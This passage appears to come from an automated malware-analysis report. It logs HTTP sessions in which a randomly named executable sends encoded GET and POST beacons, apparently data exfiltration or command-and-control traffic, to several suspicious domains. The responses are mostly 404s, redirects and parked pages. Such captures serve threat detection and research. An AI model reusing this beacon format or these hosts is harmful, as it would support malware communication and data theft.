                                              52 | 192.168.11.30 | 49945 | 206.119.82.147 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:29:44.048887968 CEST | 490 | OUT | GET /vacs/?7LY=Nw81+Usn0fanr8WCjEPwkk6RKTBWBdcWh3ZdisqFiDj5qtm6fUSc5UPRHiDGmrqRFt3sYIjXu/E976BkZ2ULyaZi6O7ym0jmurwAsFjcKbC3uyaytRFMIWQ=&Nze=C0klVT HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:44.367574930 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              53 | 192.168.11.30 | 49946 | 208.91.197.27 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:29:52.607949972 CEST | 500 | OUT | GET /4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVT HTTP/1.1
                                              Host: www.brainchainllc.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:53.083487988 CEST | 844 | IN | HTTP/1.1 200 OK
                                              Date: Tue, 24 Sep 2024 09:29:52 GMT
                                              Server: Apache
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jq7WvaVVw2GzTWUtO3e1k/AlZy2zLW2ruPCVetemRPT8v48eBW20rMd118dofOTeJ2ImRdG+8A0gaar3j7dyYQ==
                                              Content-Length: 2640
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Sep 24, 2024 11:29:53.083523989 CEST | 339 | IN
                                              Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jq7WvaVVw2GzTWUtO3e1k/AlZy2zLW2ruPCVetemRPT8v48eBW20rMd118dofOTeJ2ImRdG+8A
                                              Sep 24, 2024 11:29:53.083539009 CEST | 1220 | IN
                                              Data Ascii: ascript" src="http://www.brainchainllc.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.brainchainllc.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglo
                                              Sep 24, 2024 11:29:53.083553076 CEST | 1081 | IN
                                              Data Ascii: all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              54 | 192.168.11.30 | 49947 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:29:58.423151016 CEST | 755 | OUT | POST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=y9Ut54SIgwt80nPmWn3cHEl8XGAPpXHxrXGpJFbVDvX8NvNqGSf/K+/AeDKcV3m1tPQiN15IJLZpfNYHfOQmZ+TXTcUugsJbHK0eBFGLNYy2LAFTOoKhFjeBngOZn2s/XysZYZ9oBkCqHpsiYZ8/dYeBN1voY7pgQR8yEdZRBNDX7HfnZFyX4NqS+tHBdVluJw==
                                              Sep 24, 2024 11:29:58.737744093 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              55 | 192.168.11.30 | 49948 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:01.285279036 CEST | 775 | OUT | POST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=y9Ut54SIgwt80G/mREfcSUl9SGAPj3H1rXKpJEvFDb78ONVqFTf/J+/AVjKFR3mutOtXN39IJL9pfPAHe5EhYuTVe8Us+cJbHK0eBG7DNY62XjdTOKiiMDee3AOZtWtXXyt8YbJWBiOqHr0iYLUwO4eDCVuMc5sRRTc7NO0JYc6r6Qu9EGGVrtW/isqpfXk1Uwtyr83p3LdT16pvv3WJ+F4=
                                              Sep 24, 2024 11:30:01.603801012 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:30:01 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              56 | 192.168.11.30 | 49949 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:04.142028093 CEST | 2578 | OUT | POST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:04.546061039 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:30:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              57 | 192.168.11.30 | 49950 | 206.119.82.131 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:06.993084908 CEST | 490 | OUT | GET /opa3/?7LY=//8N6NGdtRkn6yq8W3OBQnInDVkPrmeKzEa9OWHVIp2tO8AGOHzwJOfidi6bYHK8g9UFVHI1UtpxcaY/CfI8S9y/PcE6w9RcCLRpAW2RNdWqNgB6ObbfL00=&Nze=C0klVT HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:07.308634996 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:30:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              58 | 192.168.11.30 | 49951 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:12.508598089 CEST | 758 | OUT | POST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN1tM5z6rc7ermYnbfVnfyNQfMFuO5nSSxCegL12rj18MgeSHKazz/8cnE1iHLDTqEcege5/3EpGiKewOyti30ENzP6SLDXrjrY/0Lvdth+zUDtSy6Bdz3TbLFBHH9t4C/IwdvvCSeWXhKVr4okipFwSRNJacUhzYl2H40EGTFBPy+CiQffF934g==
                                              Sep 24, 2024 11:30:12.689295053 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:12 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              59 | 192.168.11.30 | 49952 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:15.208142042 CEST | 778 | OUT | POST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=q0gd0Dm4Z0XN0Nc5xZDc9+rnEXbfC3fuNRjMFsipmgGxC/QL03rj28MgQyHPHjyS8c651n/LDSOEceQe+IjD7GiMGAOwpi30ENzP6SeoXrrrEeEL9vVihDUMnyy6Fdz7TbLnBGa1t9G/IyFvhxKdfXhMRr58qygT7hpeMNsTjWc93QJuZFnHSvOTej93dH8slnFFbQiFR1fXpN6KSb/MGvQ=
                                              Sep 24, 2024 11:30:15.388524055 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:15 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              60 | 192.168.11.30 | 49953 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:17.909603119 CEST | 2578 | OUT | POST /h5ax/ HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.onetoph.xyz
                                              Referer: http://www.onetoph.xyz/h5ax/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:18.089972973 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:17 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              61 | 192.168.11.30 | 49954 | 209.74.95.29 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:20.609572887 CEST | 491 | OUT | GET /h5ax/?Nze=C0klVT&7LY=n2I933S2b2mTz9MH4ovHwta6aGzwDUSLbibwCM+kpCP4ce0V2B3v1/0mQi7obzyu6tSS6Xr/MEeQSasqmevZ/lWReC/hsjnmM5iDoTysJMz5ecITkOwwomo= HTTP/1.1
                                              Host: www.onetoph.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:20.788508892 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Date: Tue, 24 Sep 2024 09:30:20 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 13928
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              62 | 192.168.11.30 | 49956 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:26.154400110 CEST | 752 | OUT | POST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:26.675681114 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              63 | 192.168.11.30 | 49957 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:29.041012049 CEST | 772 | OUT | POST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:29.574621916 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              64 | 192.168.11.30 | 49958 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:31.930614948 CEST | 2578 | OUT | POST /s4uc/ HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.52ywq.vip
                                              Referer: http://www.52ywq.vip/s4uc/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:32.464014053 CEST | 359 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              65 | 192.168.11.30 | 49959 | 13.76.137.44 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:34.816750050 CEST | 489 | OUT | GET /s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT HTTP/1.1
                                              Host: www.52ywq.vip
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:35.349067926 CEST | 495 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Tue, 24 Sep 2024 09:30:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Location: https://6329.vhjhbv.com/s4uc/?7LY=Ild9uTse2YuJI5ySpNHelXsDHBMTyrynZItWdBZgXlNghndwR+frr+8MaSbMJrCwdJQGHCdLxmoeP1A/cwrNTqld68K70lbSwMRwfxWQufsulXFA483I6pM=&Nze=C0klVT
                                              Server: CDNRay
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              66 | 192.168.11.30 | 49960 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:40.482191086 CEST | 788 | OUT | POST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=TCwg+l1JR5obVkgpFt88qZniyJoK8i6Ik+1oV/ZTaylaY6vOVuADvtElnuRV1RLgstesj6akYKjVFUf5gxDQk5F4ZDXNqJ3iZhcpQw0D/lKta+dtvsZhJVp124gN/KPCkbBq80mSvMVVfMPLbSRZ2UHTktoCa+BMdMqZfPuRHNsRC17XqpIIk8ehwZ+0NEXyXw==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              67 | 192.168.11.30 | 49961 | 3.33.130.190 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:30:43.118777037 CEST | 808 | OUT | POST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
